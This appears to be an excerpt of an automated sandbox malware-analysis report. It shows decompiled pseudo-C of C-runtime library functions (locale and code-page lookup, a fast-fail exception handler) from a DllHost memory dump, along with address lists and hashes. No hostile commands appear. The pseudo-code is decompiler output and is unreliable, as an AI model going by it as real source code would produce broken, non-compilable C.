                                                                                                                                                              0x7ff7191f33c4
                                                                                                                                                              0x7ff7191f33cf
                                                                                                                                                              0x7ff7191f33d4
                                                                                                                                                              0x7ff7191f33da
                                                                                                                                                              0x7ff7191f33df
                                                                                                                                                              0x7ff7191f33e4
                                                                                                                                                              0x7ff7191f33e7
                                                                                                                                                              0x7ff7191f33e9
                                                                                                                                                              0x7ff7191f33ec
                                                                                                                                                              0x7ff7191f33fa
                                                                                                                                                              0x7ff7191f3407
                                                                                                                                                              0x7ff7191f340c
                                                                                                                                                              0x7ff7191f3413
                                                                                                                                                              0x7ff7191f3417
                                                                                                                                                              0x7ff7191f341c
                                                                                                                                                              0x7ff7191f341f
                                                                                                                                                              0x7ff7191f3422
                                                                                                                                                              0x7ff7191f3425
                                                                                                                                                              0x7ff7191f3440
                                                                                                                                                              0x7ff7191f3443
                                                                                                                                                              0x7ff7191f3447
                                                                                                                                                              0x7ff7191f344d
                                                                                                                                                              0x7ff7191f3452
                                                                                                                                                              0x7ff7191f3455
                                                                                                                                                              0x7ff7191f345b
                                                                                                                                                              0x7ff7191f3460
                                                                                                                                                              0x7ff7191f3466
                                                                                                                                                              0x7ff7191f346a
                                                                                                                                                              0x7ff7191f3470
                                                                                                                                                              0x7ff7191f3476
                                                                                                                                                              0x7ff7191f347e
                                                                                                                                                              0x7ff7191f34ac

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                              • API String ID: 808467561-2761157908
                                                                                                                                                              • Opcode ID: 0c18aac27bb5911d2d775ac105e115eab9d21d168c13aba56cb1235b76f9fd63
                                                                                                                                                              • Instruction ID: a20d4908991675bb687798c44c034f661a9800b76e48ba8861946c7abaeadc4a
                                                                                                                                                              • Opcode Fuzzy Hash: 0c18aac27bb5911d2d775ac105e115eab9d21d168c13aba56cb1235b76f9fd63
                                                                                                                                                              • Instruction Fuzzy Hash: 8EB20772A089868AF765DE24E4407F8B7B1FB4439CF901535DB0A57B84EB38E58EDB10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F0F88 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E00007FF77FF7191F0F88(void* __ecx, void* __edx, long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r8, signed int __r9) {
				intOrPtr _t37;
				intOrPtr _t49;
				void* _t50;
				void* _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t114;
				intOrPtr* _t118;
				long long _t121;
				void* _t122;
				void* _t124;
				signed long long _t137;
				void* _t138;
				void* _t139;
				int _t141;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t145;

				_t110 = __rdx;
				_t50 = __ecx;
				_t87 = _t124;
				 *((long long*)(_t87 + 8)) = __rbx;
				 *((long long*)(_t87 + 0x10)) = _t121;
				 *((long long*)(_t87 + 0x18)) = __rsi;
				 *((long long*)(_t87 + 0x20)) = __rdi;
				_push(_t139);
				_t122 = __r8;
				_t142 = __rdx;
				_t118 = __rcx;
				E00007FF77FF7191E5AC4(_t87, __rbx, __rdx, __rcx, _t144);
				r12d = 0;
				_t5 = _t87 + 0x98; // 0x98
				_t93 = _t5;
				_t88 = _t118 + 0x80;
				 *((intOrPtr*)(_t93 + 0x10)) = r12d;
				_t8 = _t93 + 0x258; // 0x2f0
				_t145 = _t8;
				 *_t93 = _t118;
				_t9 = _t93 + 8; // 0xa0
				_t114 = _t9;
				 *_t145 = r12w;
				 *_t114 = _t88;
				if ( *_t88 == r12w) goto 0x191f0ffd;
				_t10 = _t139 + 0x16; // 0x16
				E00007FF77FF7191F0EEC(_t10, _t93, 0x1920a510, _t114, _t118, _t114);
				if ( *((intOrPtr*)( *_t93)) == r12w) goto 0x191f1053;
				if ( *((intOrPtr*)( *_t114)) == r12w) goto 0x191f1016;
				E00007FF77FF7191F087C(_t93, _t93, _t114, __r9);
				goto 0x191f101b;
				E00007FF77FF7191F094C(_t93, _t93, _t114, __r9);
				if ( *((intOrPtr*)(_t93 + 0x10)) != r12d) goto 0x191f1062;
				if (E00007FF77FF7191F0EEC(0x40, _t93, 0x1920a0f0, _t114, _t118, _t93) == 0) goto 0x191f1058;
				_t90 =  *_t114;
				if ( *_t90 == r12w) goto 0x191f104c;
				E00007FF77FF7191F087C(_t93, _t93, _t93, __r9);
				goto 0x191f1058;
				E00007FF77FF7191F094C(_t93, _t93, _t93, __r9);
				goto 0x191f1058;
				E00007FF77FF7191F07D4(_t50,  *_t90 - r12w, _t93, _t93, _t110, _t93, __r9);
				if ( *((intOrPtr*)(_t93 + 0x10)) == r12d) goto 0x191f11b5;
				if ( *_t118 != r12w) goto 0x191f107d;
				if ( *((intOrPtr*)(_t118 + 0x100)) != r12w) goto 0x191f107d;
				GetACP();
				goto 0x191f1085;
				_t37 = E00007FF77FF7191F0DBC(_t50, _t93, _t118 + 0x100, _t93, _t118, __r8, __r9);
				_t49 = _t37;
				if (_t37 == 0) goto 0x191f11b5;
				if (_t37 == 0xfde8) goto 0x191f11b5;
				if (IsValidCodePage(_t141) == 0) goto 0x191f11b5;
				if (_t142 == 0) goto 0x191f10b3;
				 *_t142 = _t49;
				if (_t122 == 0) goto 0x191f11ae;
				_t119 = _t122 + 0x120;
				 *((intOrPtr*)(_t122 + 0x120)) = r12w;
				_t137 = (__r9 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t145 + _t137 * 2)) != r12w) goto 0x191f10cb;
				_t138 = _t137 + 1;
				if (E00007FF77FF7191EF3D4(_t90, _t93, _t122 + 0x120, _t93, _t145, _t138) != 0) goto 0x191f11d6;
				_t17 = _t90 + 0x40; // 0x40
				r9d = _t17;
				if (E00007FF77FF7191E7BB8(0x1001, E00007FF77FF7191EF3D4(_t90, _t93, _t122 + 0x120, _t93, _t145, _t138), _t90, _t93, _t122 + 0x120, _t122 + 0x120, _t122, _t122) == 0) goto 0x191f11b5;
				r9d = 0x40;
				if (E00007FF77FF7191E7BB8(0x1002, E00007FF77FF7191E7BB8(0x1001, E00007FF77FF7191EF3D4(_t90, _t93, _t122 + 0x120, _t93, _t145, _t138), _t90, _t93, _t122 + 0x120, _t122 + 0x120, _t122, _t122), _t90, _t93, _t122 + 0x120, _t119, _t122, _t122 + 0x80) == 0) goto 0x191f11b5;
				E00007FF77FF7191F7128(0x5f, _t122 + 0x80, _t138);
				if (_t90 != 0) goto 0x191f1153;
				_t19 = _t90 + 0x2e; // 0x2e
				E00007FF77FF7191F7128(_t19, _t122 + 0x80, _t138);
				if (_t90 == 0) goto 0x191f116c;
				r9d = 0x40;
				_t20 = _t138 - 0x39; // 0x7
				if (E00007FF77FF7191E7BB8(_t20, _t90, _t90, _t93, _t119, _t119, _t122, _t122 + 0x80) == 0) goto 0x191f11b5;
				if (_t49 != 0xfde9) goto 0x191f119a;
				r9d = 5;
				if (E00007FF77FF7191EF3D4(_t122 + 0x100, _t93, _t122 + 0x100, _t93, L"utf8", _t138) != 0) goto 0x191f11d6;
				goto 0x191f11ae;
				r9d = 0xa;
				_t23 = _t138 + 6; // 0x46
				r8d = _t23;
				E00007FF77FF7191F5B80(_t49);
				goto 0x191f11b7;
				return 0;
			}






















                                                                                                                                                              0x7ff7191f0f88
                                                                                                                                                              0x7ff7191f0f88
                                                                                                                                                              0x7ff7191f0f88
                                                                                                                                                              0x7ff7191f0f8b
                                                                                                                                                              0x7ff7191f0f8f
                                                                                                                                                              0x7ff7191f0f93
                                                                                                                                                              0x7ff7191f0f97
                                                                                                                                                              0x7ff7191f0f9b
                                                                                                                                                              0x7ff7191f0fa5
                                                                                                                                                              0x7ff7191f0fa8
                                                                                                                                                              0x7ff7191f0fab
                                                                                                                                                              0x7ff7191f0fae
                                                                                                                                                              0x7ff7191f0fb3
                                                                                                                                                              0x7ff7191f0fb9
                                                                                                                                                              0x7ff7191f0fb9
                                                                                                                                                              0x7ff7191f0fc0
                                                                                                                                                              0x7ff7191f0fc7
                                                                                                                                                              0x7ff7191f0fcb
                                                                                                                                                              0x7ff7191f0fcb
                                                                                                                                                              0x7ff7191f0fd2
                                                                                                                                                              0x7ff7191f0fd5
                                                                                                                                                              0x7ff7191f0fd5
                                                                                                                                                              0x7ff7191f0fd9
                                                                                                                                                              0x7ff7191f0fdd
                                                                                                                                                              0x7ff7191f0fe4
                                                                                                                                                              0x7ff7191f0fe9
                                                                                                                                                              0x7ff7191f0ff5
                                                                                                                                                              0x7ff7191f1004
                                                                                                                                                              0x7ff7191f100d
                                                                                                                                                              0x7ff7191f100f
                                                                                                                                                              0x7ff7191f1014
                                                                                                                                                              0x7ff7191f1016
                                                                                                                                                              0x7ff7191f101f
                                                                                                                                                              0x7ff7191f1037
                                                                                                                                                              0x7ff7191f1039
                                                                                                                                                              0x7ff7191f1043
                                                                                                                                                              0x7ff7191f1045
                                                                                                                                                              0x7ff7191f104a
                                                                                                                                                              0x7ff7191f104c
                                                                                                                                                              0x7ff7191f1051
                                                                                                                                                              0x7ff7191f1053
                                                                                                                                                              0x7ff7191f105c
                                                                                                                                                              0x7ff7191f106d
                                                                                                                                                              0x7ff7191f1073
                                                                                                                                                              0x7ff7191f1075
                                                                                                                                                              0x7ff7191f107b
                                                                                                                                                              0x7ff7191f1080
                                                                                                                                                              0x7ff7191f1085
                                                                                                                                                              0x7ff7191f1089
                                                                                                                                                              0x7ff7191f1094
                                                                                                                                                              0x7ff7191f10a5
                                                                                                                                                              0x7ff7191f10ae
                                                                                                                                                              0x7ff7191f10b0
                                                                                                                                                              0x7ff7191f10b6
                                                                                                                                                              0x7ff7191f10bc
                                                                                                                                                              0x7ff7191f10c7
                                                                                                                                                              0x7ff7191f10cb
                                                                                                                                                              0x7ff7191f10d3
                                                                                                                                                              0x7ff7191f10d5
                                                                                                                                                              0x7ff7191f10ea
                                                                                                                                                              0x7ff7191f10f0
                                                                                                                                                              0x7ff7191f10f0
                                                                                                                                                              0x7ff7191f1106
                                                                                                                                                              0x7ff7191f1113
                                                                                                                                                              0x7ff7191f112b
                                                                                                                                                              0x7ff7191f1139
                                                                                                                                                              0x7ff7191f1141
                                                                                                                                                              0x7ff7191f1143
                                                                                                                                                              0x7ff7191f1149
                                                                                                                                                              0x7ff7191f1151
                                                                                                                                                              0x7ff7191f1153
                                                                                                                                                              0x7ff7191f115f
                                                                                                                                                              0x7ff7191f116a
                                                                                                                                                              0x7ff7191f1179
                                                                                                                                                              0x7ff7191f117b
                                                                                                                                                              0x7ff7191f1196
                                                                                                                                                              0x7ff7191f1198
                                                                                                                                                              0x7ff7191f119a
                                                                                                                                                              0x7ff7191f11a5
                                                                                                                                                              0x7ff7191f11a5
                                                                                                                                                              0x7ff7191f11a9
                                                                                                                                                              0x7ff7191f11b3
                                                                                                                                                              0x7ff7191f11d5

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FF7191E5AC4: GetLastError.KERNEL32(?,?,?,00007FF7191D8733,?,?,00000000,00007FF7191EC0EC), ref: 00007FF7191E5AD3
                                                                                                                                                                • Part of subcall function 00007FF7191E5AC4: SetLastError.KERNEL32(?,?,?,00007FF7191D8733,?,?,00000000,00007FF7191EC0EC), ref: 00007FF7191E5B71
                                                                                                                                                              • TranslateName.LIBCMT ref: 00007FF7191F0FF5
                                                                                                                                                              • TranslateName.LIBCMT ref: 00007FF7191F1030
                                                                                                                                                              • GetACP.KERNEL32(?,?,?,00000001,?,00007FF7191E34A7), ref: 00007FF7191F1075
                                                                                                                                                              • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00007FF7191E34A7), ref: 00007FF7191F109D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastNameTranslate$CodePageValid
                                                                                                                                                              • String ID: utf8
                                                                                                                                                              • API String ID: 2136749100-905460609
                                                                                                                                                              • Opcode ID: d4e9d283735ff363d5a7310ba023d11618727ff18293d56b28c818d978fb0fcb
                                                                                                                                                              • Instruction ID: 2a9b15d5d9912f7fbdfa0634687ac9abf896a0572972315fb9da098105425322
                                                                                                                                                              • Opcode Fuzzy Hash: d4e9d283735ff363d5a7310ba023d11618727ff18293d56b28c818d978fb0fcb
                                                                                                                                                              • Instruction Fuzzy Hash: 65918032A08B4685FB60BF21E4002B9A2B5BB45BA8F844131DB4D47785EF3CE59ED760
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F19BC Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 56%
                                                                                                                                                              			E00007FF77FF7191F19BC(void* __ecx, void* __edx, long long __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
				signed int _v72;
				int _v80;
				int _v84;
				signed int _v88;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				int _t60;
				intOrPtr _t61;
				void* _t73;
				intOrPtr _t82;
				intOrPtr _t84;
				void* _t90;
				signed long long _t116;
				signed long long _t117;
				intOrPtr* _t118;
				intOrPtr* _t119;
				intOrPtr* _t120;
				intOrPtr* _t121;
				intOrPtr* _t122;
				void* _t125;
				intOrPtr* _t126;
				signed long long _t134;
				signed long long _t136;
				void* _t147;
				void* _t148;
				signed long long _t149;
				void* _t151;
				void* _t159;
				long long _t160;
				intOrPtr* _t162;

				_t159 = __r9;
				_t141 = __rdx;
				_t73 = __ecx;
				_t116 =  *0x192190a0; // 0x590452ce5669
				_t117 = _t116 ^ _t151 - 0x00000040;
				_v72 = _t117;
				_t147 = __r8;
				_t162 = __rdx;
				_t160 = __rcx;
				E00007FF77FF7191E5AC4(_t117, _t125, __rdx, _t148);
				_t149 = _t117;
				_v88 = _t117;
				_v80 = 0;
				E00007FF77FF7191E5AC4(_t117, _t125, _t141, _t149);
				r12d = 0;
				_t5 = _t149 + 0xa0; // 0xa0
				_t126 = _t5;
				 *((long long*)(_t117 + 0x3a0)) =  &_v88;
				_t118 = _t160 + 0x80;
				 *((long long*)(_t149 + 0x98)) = _t160;
				 *_t126 = _t118;
				if (_t118 == 0) goto 0x191f1a43;
				if ( *_t118 == r12w) goto 0x191f1a43;
				_t82 =  *0x1920a680; // 0x17
				E00007FF77FF7191F193C(_t82 - 1, _t126, 0x1920a510, _t149, _t151, _t126);
				_v88 = r12d;
				_t119 =  *((intOrPtr*)(_t149 + 0x98));
				if (_t119 == 0) goto 0x191f1acc;
				if ( *_t119 == r12w) goto 0x191f1acc;
				_t120 =  *_t126;
				if (_t120 == 0) goto 0x191f1a72;
				if ( *_t120 == r12w) goto 0x191f1a72;
				E00007FF77FF7191F12D4(_t73, _t82 - 1, _t120, _t126,  &_v88, _t141, _t126);
				goto 0x191f1a7b;
				E00007FF77FF7191F13A4(_t73, _t82 - 1, _t120, _t126,  &_v88, _t141, _t126);
				if (_v88 != r12d) goto 0x191f1b42;
				_t84 =  *0x1920a500; // 0x41
				_t14 = _t149 + 0x98; // 0x98
				if (E00007FF77FF7191F193C(_t84 - 1, _t126, 0x1920a0f0, _t149, _t151, _t14) == 0) goto 0x191f1b38;
				_t121 =  *_t126;
				if (_t121 == 0) goto 0x191f1ac1;
				if ( *_t121 == r12w) goto 0x191f1ac1;
				E00007FF77FF7191F12D4(_t73, _t84 - 1, _t121, _t126,  &_v88, _t141, _t14);
				goto 0x191f1b38;
				_t134 =  &_v88;
				E00007FF77FF7191F13A4(_t73, _t84 - 1, _t121, _t126, _t134, _t141, _t14);
				goto 0x191f1b38;
				_t122 =  *_t126;
				if (_t122 == 0) goto 0x191f1b25;
				if ( *_t122 == r12w) goto 0x191f1b25;
				E00007FF77FF7191E5AC4(_t122, _t126, _t141, _t149);
				_t136 = (_t134 | 0xffffffff) + 1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0xa0)) + _t136 * 2)) != r12w) goto 0x191f1aed;
				 *(_t122 + 0xb4) = r12d & 0xffffff00 | _t136 == 0x00000003;
				EnumSystemLocalesW(??, ??);
				if ((_v88 & 0x00000004) != 0) goto 0x191f1b38;
				_v88 = r12d;
				goto 0x191f1b38;
				_v88 = 0x104;
				_t60 = GetUserDefaultLCID();
				_v80 = _t60;
				_v84 = _t60;
				if (_v88 == r12d) goto 0x191f1c1d;
				asm("dec eax");
				_t61 = E00007FF77FF7191F17E0(_t126, 0x7ff7191f11ec & _t160 + 0x00000100,  &_v88, _t149);
				if (_t61 == 0) goto 0x191f1c1d;
				if (IsValidCodePage(??) == 0) goto 0x191f1c1d;
				if (IsValidLocale(??, ??) == 0) goto 0x191f1c1d;
				if (_t162 == 0) goto 0x191f1b94;
				 *_t162 = _t61;
				_t36 = _t149 + 0x2f0; // 0x2f0
				r9d = 0;
				_t37 = _t159 + 0x55; // 0x55
				_t90 = _t37;
				r8d = _t90;
				E00007FF77FF7191E7D5C(_v84, _t162, _t160 + 0x100, _t126, _t36, _t149, _t151);
				if (_t147 == 0) goto 0x191f1c16;
				r9d = 0;
				r8d = _t90;
				E00007FF77FF7191E7D5C(_v84, _t147, _t160 + 0x100, _t126, _t147 + 0x120, _t149, _t151);
				r9d = 0x40;
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x191f1c1d;
				r9d = 0x40;
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x191f1c1d;
				_t44 = _t149 - 0x36; // 0xa
				r9d = _t44;
				_t45 = _t149 - 0x30; // 0x10
				r8d = _t45;
				E00007FF77FF7191F5B80(_t61);
				goto 0x191f1c1f;
				return E00007FF77FF7191D23B0(0, _t61, _v72 ^ _t151 - 0x00000040);
			}


































                                                                                                                                                              0x7ff7191f19bc
                                                                                                                                                              0x7ff7191f19bc
                                                                                                                                                              0x7ff7191f19bc
                                                                                                                                                              0x7ff7191f19ce
                                                                                                                                                              0x7ff7191f19d5
                                                                                                                                                              0x7ff7191f19d8
                                                                                                                                                              0x7ff7191f19dc
                                                                                                                                                              0x7ff7191f19df
                                                                                                                                                              0x7ff7191f19e2
                                                                                                                                                              0x7ff7191f19e5
                                                                                                                                                              0x7ff7191f19ea
                                                                                                                                                              0x7ff7191f19ef
                                                                                                                                                              0x7ff7191f19f3
                                                                                                                                                              0x7ff7191f19f6
                                                                                                                                                              0x7ff7191f19ff
                                                                                                                                                              0x7ff7191f1a02
                                                                                                                                                              0x7ff7191f1a02
                                                                                                                                                              0x7ff7191f1a09
                                                                                                                                                              0x7ff7191f1a10
                                                                                                                                                              0x7ff7191f1a17
                                                                                                                                                              0x7ff7191f1a1e
                                                                                                                                                              0x7ff7191f1a24
                                                                                                                                                              0x7ff7191f1a2a
                                                                                                                                                              0x7ff7191f1a2c
                                                                                                                                                              0x7ff7191f1a3e
                                                                                                                                                              0x7ff7191f1a43
                                                                                                                                                              0x7ff7191f1a47
                                                                                                                                                              0x7ff7191f1a51
                                                                                                                                                              0x7ff7191f1a57
                                                                                                                                                              0x7ff7191f1a59
                                                                                                                                                              0x7ff7191f1a5f
                                                                                                                                                              0x7ff7191f1a65
                                                                                                                                                              0x7ff7191f1a6b
                                                                                                                                                              0x7ff7191f1a70
                                                                                                                                                              0x7ff7191f1a76
                                                                                                                                                              0x7ff7191f1a7f
                                                                                                                                                              0x7ff7191f1a85
                                                                                                                                                              0x7ff7191f1a8b
                                                                                                                                                              0x7ff7191f1aa2
                                                                                                                                                              0x7ff7191f1aa8
                                                                                                                                                              0x7ff7191f1aae
                                                                                                                                                              0x7ff7191f1ab4
                                                                                                                                                              0x7ff7191f1aba
                                                                                                                                                              0x7ff7191f1abf
                                                                                                                                                              0x7ff7191f1ac1
                                                                                                                                                              0x7ff7191f1ac5
                                                                                                                                                              0x7ff7191f1aca
                                                                                                                                                              0x7ff7191f1acc
                                                                                                                                                              0x7ff7191f1ad2
                                                                                                                                                              0x7ff7191f1ad8
                                                                                                                                                              0x7ff7191f1ada
                                                                                                                                                              0x7ff7191f1aed
                                                                                                                                                              0x7ff7191f1af5
                                                                                                                                                              0x7ff7191f1b08
                                                                                                                                                              0x7ff7191f1b13
                                                                                                                                                              0x7ff7191f1b1d
                                                                                                                                                              0x7ff7191f1b1f
                                                                                                                                                              0x7ff7191f1b23
                                                                                                                                                              0x7ff7191f1b25
                                                                                                                                                              0x7ff7191f1b2c
                                                                                                                                                              0x7ff7191f1b32
                                                                                                                                                              0x7ff7191f1b35
                                                                                                                                                              0x7ff7191f1b3c
                                                                                                                                                              0x7ff7191f1b50
                                                                                                                                                              0x7ff7191f1b56
                                                                                                                                                              0x7ff7191f1b5f
                                                                                                                                                              0x7ff7191f1b70
                                                                                                                                                              0x7ff7191f1b86
                                                                                                                                                              0x7ff7191f1b8f
                                                                                                                                                              0x7ff7191f1b91
                                                                                                                                                              0x7ff7191f1b97
                                                                                                                                                              0x7ff7191f1b9e
                                                                                                                                                              0x7ff7191f1ba1
                                                                                                                                                              0x7ff7191f1ba1
                                                                                                                                                              0x7ff7191f1ba5
                                                                                                                                                              0x7ff7191f1ba8
                                                                                                                                                              0x7ff7191f1bb0
                                                                                                                                                              0x7ff7191f1bbc
                                                                                                                                                              0x7ff7191f1bbf
                                                                                                                                                              0x7ff7191f1bc2
                                                                                                                                                              0x7ff7191f1bcf
                                                                                                                                                              0x7ff7191f1be2
                                                                                                                                                              0x7ff7191f1bee
                                                                                                                                                              0x7ff7191f1bfe
                                                                                                                                                              0x7ff7191f1c09
                                                                                                                                                              0x7ff7191f1c09
                                                                                                                                                              0x7ff7191f1c0d
                                                                                                                                                              0x7ff7191f1c0d
                                                                                                                                                              0x7ff7191f1c11
                                                                                                                                                              0x7ff7191f1c1b
                                                                                                                                                              0x7ff7191f1c39

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3939093798-0
                                                                                                                                                              • Opcode ID: d72e8e3284b8b08f8b18e82ea9aa9b6739037b065a9e7ba0ffcdabe2f122f43a
                                                                                                                                                              • Instruction ID: cc4733901641b6d0ab5ba335ba0e1f25af43bc60a57b6a0d1138a9523ad85977
                                                                                                                                                              • Opcode Fuzzy Hash: d72e8e3284b8b08f8b18e82ea9aa9b6739037b065a9e7ba0ffcdabe2f122f43a
                                                                                                                                                              • Instruction Fuzzy Hash: 24715B32F08A4A89FB11AF61E4542B8A3B0BF45768F844135CB1D57695FF3CA48ED760
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D2F58 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                              			E00007FF77FF7191D2F58(signed int __ecx, void* __rax, long long __rbx) {
				void* _t35;
				void* _t36;
				int _t38;
				void* _t58;
				void* _t76;
				long _t79;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t85;

				_t58 = __rax;
				 *((long long*)(_t82 + 8)) = __rbx;
				_t80 = _t82 - 0x4c0;
				_t83 = _t82 - 0x5c0;
				if (IsProcessorFeaturePresent(_t79) == 0) goto 0x191d2f82;
				asm("int 0x29");
				_t35 = E00007FF77FF7191D2F50(_t34);
				r8d = 0x4d0;
				_t36 = E00007FF77FF7191D4A30(_t35, 0, _t80 - 0x10, _t76, _t85);
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t58 == 0) goto 0x191d3002;
				 *(_t83 + 0x38) =  *(_t83 + 0x38) & 0x00000000;
				 *((long long*)(_t83 + 0x30)) = _t80 + 0x4e0;
				 *((long long*)(_t83 + 0x28)) = _t80 + 0x4e8;
				 *((long long*)(_t83 + 0x20)) = _t80 - 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t80 + 0xe8)) =  *((intOrPtr*)(_t80 + 0x4c8));
				r8d = 0x98;
				 *((long long*)(_t80 + 0x88)) = _t80 + 0x4d0;
				E00007FF77FF7191D4A30(_t36, 0, _t83 + 0x50,  *((intOrPtr*)(_t80 + 0x4d8)),  *((intOrPtr*)(_t80 + 0xe8)));
				 *((long long*)(_t83 + 0x60)) =  *((intOrPtr*)(_t80 + 0x4c8));
				 *((intOrPtr*)(_t83 + 0x50)) = 0x40000015;
				 *((intOrPtr*)(_t83 + 0x54)) = 1;
				_t38 = IsDebuggerPresent();
				 *((long long*)(_t83 + 0x40)) = _t83 + 0x50;
				 *((long long*)(_t83 + 0x48)) = _t80 - 0x10;
				SetUnhandledExceptionFilter(??);
				if (UnhandledExceptionFilter(??) != 0) goto 0x191d3092;
				if ((__ecx & 0xffffff00 | _t38 == 0x00000001) != 0) goto 0x191d3092;
				return E00007FF77FF7191D2F50(_t40);
			}













                                                                                                                                                              0x7ff7191d2f58
                                                                                                                                                              0x7ff7191d2f58
                                                                                                                                                              0x7ff7191d2f5e
                                                                                                                                                              0x7ff7191d2f66
                                                                                                                                                              0x7ff7191d2f7c
                                                                                                                                                              0x7ff7191d2f80
                                                                                                                                                              0x7ff7191d2f87
                                                                                                                                                              0x7ff7191d2f92
                                                                                                                                                              0x7ff7191d2f98
                                                                                                                                                              0x7ff7191d2fa1
                                                                                                                                                              0x7ff7191d2fb8
                                                                                                                                                              0x7ff7191d2fbb
                                                                                                                                                              0x7ff7191d2fc4
                                                                                                                                                              0x7ff7191d2fc6
                                                                                                                                                              0x7ff7191d2fdd
                                                                                                                                                              0x7ff7191d2fec
                                                                                                                                                              0x7ff7191d2ff5
                                                                                                                                                              0x7ff7191d2ffc
                                                                                                                                                              0x7ff7191d300e
                                                                                                                                                              0x7ff7191d301e
                                                                                                                                                              0x7ff7191d3028
                                                                                                                                                              0x7ff7191d302f
                                                                                                                                                              0x7ff7191d303b
                                                                                                                                                              0x7ff7191d3040
                                                                                                                                                              0x7ff7191d3048
                                                                                                                                                              0x7ff7191d3050
                                                                                                                                                              0x7ff7191d305e
                                                                                                                                                              0x7ff7191d306a
                                                                                                                                                              0x7ff7191d3071
                                                                                                                                                              0x7ff7191d3084
                                                                                                                                                              0x7ff7191d3088
                                                                                                                                                              0x7ff7191d30a2

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
